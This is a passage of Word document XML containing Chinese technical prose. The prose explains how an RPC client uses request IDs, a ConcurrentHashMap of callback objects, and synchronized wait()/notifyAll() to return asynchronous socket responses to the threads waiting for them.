          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务端接收到请求并处理后，将结果（此结果中包含了前面的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，即回传）发送给客户端，客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>连接上</w:t>
      </w:r>
      <w:r w:rsidRPr="00B630AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>专门监听消息的线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>收到消息，分析结果，取到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，再从前面的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get(ID)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，从而找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00B630AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，将方法调用结果设置到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象里。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>监听线程接着使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取回调对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的锁（因为前面调用过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>wait()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，那个线程已释放</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的锁了），再</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>notifyAll()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，唤醒前面处于等待状态的线程继续执行（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法继续执行就能拿到调用结果了），至此，整个过程结束。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里还需要画一个大图来描述，后面再补了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要注意的是，这里的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象是每次调用产生一个新的，不能共享，否则会有问题；另外</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>必需至少保证在一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>连接里面是唯一的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00DA54D7" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>现在，前面两个问题已经有答案了，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前线程怎么让它</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>暂停</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，等结果回来后，再向后执行？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>答：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>先生成一个对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，在一个全局</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>put(ID,obj)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存放起来，再用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>锁，再调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>obj.wait()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>让当前线程处于等待状态，然后另一消息监听线程等到服务端结果来了后，再</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>map.get(ID)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，再用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>锁，再调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>obj.notifyAll()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>唤醒前面处于等待状态的线程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正如前面所说，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通信是一个全双工的方式，如果有多个线程同时进行远程方法调用，这时建立在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>client server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之间的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>连接上会有很多双方发送的消息传递，前后顺序也可能是乱七八糟的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
